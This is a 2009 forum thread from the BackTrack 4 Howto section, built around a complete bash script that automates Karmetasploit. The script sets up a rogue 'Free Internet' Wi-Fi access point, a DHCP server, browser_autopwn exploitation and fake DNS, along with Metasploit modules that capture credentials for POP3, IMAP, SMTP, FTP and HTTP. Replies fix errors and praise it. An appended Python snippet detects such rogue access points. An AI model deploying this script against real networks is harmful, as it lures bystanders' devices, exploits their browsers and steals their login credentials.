Remote Exploit Forums > BackTrack 4 (pre) Final > BackTrack 4 Howto
#21, 08-29-2009, 11:10 AM, floyd (Senior Member, Join Date: Mar 2009, Posts: 232)

So here's my little script for the whole stuff. Don't forget to copy your /etc/dhcp3/dhcpd.conf to somewhere else, so you can restore it later. You need a dir /root/Karmetasploit and change the interface names to your needs....

Code:
#!/bin/bash
# Karmetasploit setup for BT4; run as root. Change wlan0/mon0/at0 to match your interfaces.
cd /root/Karmetasploit
# put the wireless card into monitor mode and check that injection works
airmon-ng start wlan0
aireplay-ng --test mon0
# write a minimal dhcpd.conf for the 10.0.0.0/24 network served on at0
# (this overwrites /etc/dhcp3/dhcpd.conf, so back it up first)
echo "option domain-name-servers 10.0.0.1;" > /etc/dhcp3/dhcpd.conf
echo "default-lease-time 60;" >> /etc/dhcp3/dhcpd.conf
echo "max-lease-time 72;" >> /etc/dhcp3/dhcpd.conf
echo "ddns-update-style none;" >> /etc/dhcp3/dhcpd.conf
echo "authoritative;" >> /etc/dhcp3/dhcpd.conf
echo "log-facility local7;" >> /etc/dhcp3/dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> /etc/dhcp3/dhcpd.conf
echo "range 10.0.0.100 10.0.0.254;" >> /etc/dhcp3/dhcpd.conf
echo "option routers 10.0.0.1;" >> /etc/dhcp3/dhcpd.conf
echo "option domain-name-servers 10.0.0.1;" >> /etc/dhcp3/dhcpd.conf
echo "}" >> /etc/dhcp3/dhcpd.conf
# start the soft AP in its own xterm, then wait for the at0 interface to appear
xterm -e "airbase-ng -P -C 30 -e 'Free Internet' -v mon0" &
echo "sleeping to wait for interface"
sleep 10
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
# build the Metasploit resource file (karma.rc): database, browser_autopwn,
# then one capture/fakedns server module per port
echo "load db_sqlite3" > /root/Karmetasploit/karma.rc
echo "db_create /root/Karmetasploit/karma.db" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/browser_autopwn" >> /root/Karmetasploit/karma.rc
echo "setg AUTOPWN_HOST 10.0.0.1" >> /root/Karmetasploit/karma.rc
echo "setg AUTOPWN_PORT 55550" >> /root/Karmetasploit/karma.rc
echo "setg AUTOPWN_URI /ads" >> /root/Karmetasploit/karma.rc
echo "set LHOST 10.0.0.1" >> /root/Karmetasploit/karma.rc
echo "set LPORT 45000" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 55550" >> /root/Karmetasploit/karma.rc
echo "set URIPATH /ads" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/pop3" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 110" >> /root/Karmetasploit/karma.rc
echo "set SSL false" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/pop3" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 995" >> /root/Karmetasploit/karma.rc
echo "set SSL true" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/ftp" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/imap" >> /root/Karmetasploit/karma.rc
echo "set SSL false" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 143" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/imap" >> /root/Karmetasploit/karma.rc
echo "set SSL true" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 993" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/smtp" >> /root/Karmetasploit/karma.rc
echo "set SSL false" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 25" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/smtp" >> /root/Karmetasploit/karma.rc
echo "set SSL true" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 465" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/fakedns" >> /root/Karmetasploit/karma.rc
echo "unset TARGETHOST" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 5353" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/fakedns" >> /root/Karmetasploit/karma.rc
echo "unset TARGETHOST" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 53" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/http" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 80" >> /root/Karmetasploit/karma.rc
echo "set SSL false" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/http" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 8080" >> /root/Karmetasploit/karma.rc
echo "set SSL false" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/http" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 443" >> /root/Karmetasploit/karma.rc
echo "set SSL true" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
echo "use auxiliary/server/capture/http" >> /root/Karmetasploit/karma.rc
echo "set SRVPORT 8443" >> /root/Karmetasploit/karma.rc
echo "set SSL true" >> /root/Karmetasploit/karma.rc
echo "run" >> /root/Karmetasploit/karma.rc
# launch msfconsole with the resource file in a second xterm
xterm -e "/pentest/exploits/framework3/msfconsole -r /root/Karmetasploit/karma.rc" &
__________________
Auswaertsspiel
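As an added defender-side example, not part of this thread or of floyd's script: the airbase-ng -P option in the script answers every probe request with whatever SSID the client asked for, so one BSSID appears to be many unrelated networks, while a normal AP only answers for its own SSID. The Python below flags that pattern in a list of probe-response records; the records are constructed sample data standing in for a monitor-mode capture.

```python
from collections import defaultdict

# Constructed sample probe-response frames: (timestamp_s, bssid, ssid).
# The first BSSID mimics an airbase-ng -P access point: it beacons
# "Free Internet" but also answers probes for any SSID a client remembers.
# The second BSSID behaves like an ordinary AP with one guest SSID.
SAMPLE_PROBE_RESPONSES = [
    (1.0, "00:11:22:33:44:55", "Free Internet"),
    (1.2, "00:11:22:33:44:55", "linksys"),
    (1.5, "00:11:22:33:44:55", "HomeWifi"),
    (2.0, "00:11:22:33:44:55", "attwifi"),
    (2.1, "aa:bb:cc:dd:ee:ff", "CorpNet"),
    (2.4, "aa:bb:cc:dd:ee:ff", "CorpNet"),
    (3.0, "aa:bb:cc:dd:ee:ff", "CorpNet-Guest"),
]


def karma_suspects(records, min_ssids=3, window_s=60.0):
    """Return {bssid: sorted SSIDs} for every BSSID that answered probes for
    at least min_ssids distinct SSIDs inside some window_s-second window.

    Multi-SSID APs typically use a separate BSSID per SSID, so a threshold
    of 3 is a reasonable default; raise it on busy networks.
    """
    by_bssid = defaultdict(list)
    for ts, bssid, ssid in sorted(records):
        by_bssid[bssid].append((ts, ssid))

    suspects = {}
    for bssid, seen in by_bssid.items():
        # slide a window starting at each response; seen is time-ordered
        for i, (start, _) in enumerate(seen):
            ssids = {s for t, s in seen[i:] if t - start <= window_s}
            if len(ssids) >= min_ssids:
                suspects[bssid] = sorted(ssids)
                break
    return suspects


if __name__ == "__main__":
    for bssid, ssids in karma_suspects(SAMPLE_PROBE_RESPONSES).items():
        print(f"{bssid} answered probes for {len(ssids)} SSIDs: {ssids}")
```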
#22, 08-29-2009, 11:45 AM, m-1-k-3 (Member, Join Date: Oct 2008, Posts: 70)

Quote (Originally Posted by floyd):
So here's my little script for the whole stuff. Don't forget to copy your /etc/dhcp3/dhcpd.conf to somewhere else, so you can restore it later. You need a dir /root/Karmetasploit and change the interface names to your needs....
nice stuff ... thx very much

m-1-k-3
#23, 09-02-2009, 04:51 AM, snipper_cr (Junior Member, Join Date: Jul 2007, Posts: 20)

Well, I followed your well-written tutorial on the first page. I tested injection and that works. Following all the steps, the only error I got was during the "dhcpd -cf /etc/dhcp3/dhcpd.conf at0", which is "Command not found"; however, you said to ignore the error. Is that the error to ignore? Sounds like nothing is happening there.

Once I have airbase-ng running and I run the karma.rc script, I search for a network on my XP machine and I cannot find it (essid is "Free WiFi" per instructions). However, if I manually configure it in windows, I can "connect" but cannot pull an IP. airbase-ng shows a client associating with the network.

So any idea why it's not pushing an IP, or why my XP machine cannot see the network on a normal scan?

Also [linux noobery], that script you just posted... what do I do with that? I tried running nano and saving it as "scripty.rc" and then running scripty.rc in that folder in the prompt... but am I doing it wrong?
__________________
Thanks but I know how to use search and google!
-The early bird catches the worm, but the second mouse gets the cheese.
#24, 09-02-2009, 07:32 AM, annonimo (Just burned his ISO, Join Date: Sep 2009, Posts: 1)

Quote (Originally Posted by snipper_cr):
"dhcpd -cf /etc/dhcp3/dhcpd.conf at0"
try this dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
that worked for me.
#25, 09-02-2009, 10:22 AM, floyd (Senior Member, Join Date: Mar 2009, Posts: 232)

Quote (Originally Posted by snipper_cr):
Well, I followed your well-written tutorial on the first page. I tested injection and that works. Following all the steps, the only error I got was during the "dhcpd -cf /etc/dhcp3/dhcpd.conf at0", which is "Command not found"; however, you said to ignore the error. Is that the error to ignore? Sounds like nothing is happening there.

Once I have airbase-ng running and I run the karma.rc script, I search for a network on my XP machine and I cannot find it (essid is "Free WiFi" per instructions). However, if I manually configure it in windows, I can "connect" but cannot pull an IP. airbase-ng shows a client associating with the network.

So any idea why it's not pushing an IP, or why my XP machine cannot see the network on a normal scan?

Also [linux noobery], that script you just posted... what do I do with that? I tried running nano and saving it as "scripty.rc" and then running scripty.rc in that folder in the prompt... but am I doing it wrong?
Indeed, it's dhcpd3 and not dhcpd. Try the tab key on your keyboard...

if you think you have to make a .rc script then you should go back to ubuntu, learn the basics and use this script in 1 year again.

We are not in the newbie area and we expect some basic knowledge!
__________________
Auswaertsspiel
#26, 09-02-2009, 05:46 PM, snipper_cr (Junior Member, Join Date: Jul 2007, Posts: 20)

Quote (Originally Posted by annonimo):
that worked for me.
Thanks. Useful post +1, I'll give that a try.

floyd, thanks for the clarification on scripts.
__________________
Thanks but I know how to use search and google!
-The early bird catches the worm, but the second mouse gets the cheese.
#27, 09-02-2009, 10:26 PM, Junior Member (Join Date: Mar 2009, Posts: 20)

All set, ready to go, this is going to be fun. Awesome guide, thank you; always learning something new with BackTrack.
__________________
I aint crazy just a lil mistaken
#28, 09-03-2009, 12:31 AM, Reeth (Senior Member, Join Date: Jun 2009, Posts: 120)

Quote (Originally Posted by floyd):
So here's my little script for the whole stuff. Don't forget to copy your /etc/dhcp3/dhcpd.conf to somewhere else, so you can restore it later. You need a dir /root/Karmetasploit and change the interface names to your needs....

Code: [floyd's script from post #21]
Wow! God damn! This is the first thing using airbase that works!

Thank you very much floyd!
__________________
„ I'd rather be hated for who I am,
than be loved for who I am not."
#29, 09-12-2009, 12:30 PM, Phyber.Apex (Junior Member, Join Date: Sep 2009, Posts: 6)

Quote (Originally Posted by floyd):
You have an old version... Are you using BT4 Pre Final? Do you have an internet connection (ifconfig eth0 up && dhclient eth0)? Log in as root. Try

apt-get update && apt-get upgrade && apt-get dist-upgrade

I have the following version:



Has anyone followed this guide successfully? I'm still figuring out why Metasploit only attacks when I try to reach an https page. When I want to reach an http site (like google.com), I see the "It works" page of apache (on the attacker pc /var/www/index.html), or if I shut down apache first (apache2ctl stop) I don't see any page (404 not found). Any ideas?

I will post my script which I wrote to automate setting up karmetasploit when I get home...
Hey floyd,
don't know if you still have the error; I had the same issue but got it working by removing apache from rc.d:

You can do this by running:

sudo update-rc.d -f apache2 remove

And if you decide you want apache2 to start by default again like it does now:

sudo update-rc.d apache2 defaults 91 09

Hope it works for you =D
__________________
world domination...in progress...
#30, 09-14-2009, 01:09 PM, floyd (Senior Member, Join Date: Mar 2009, Posts: 232)

Quote (Originally Posted by Phyber.Apex):
Hey floyd,
don't know if you still have the error; I had the same issue but got it working by removing apache from rc.d:

You can do this by running:

sudo update-rc.d -f apache2 remove

And if you decide you want apache2 to start by default again like it does now:

sudo update-rc.d apache2 defaults 91 09

Hope it works for you =D
I figured that out too. I just added a /etc/init.d/apache stop to my script...
__________________
Auswaertsspiel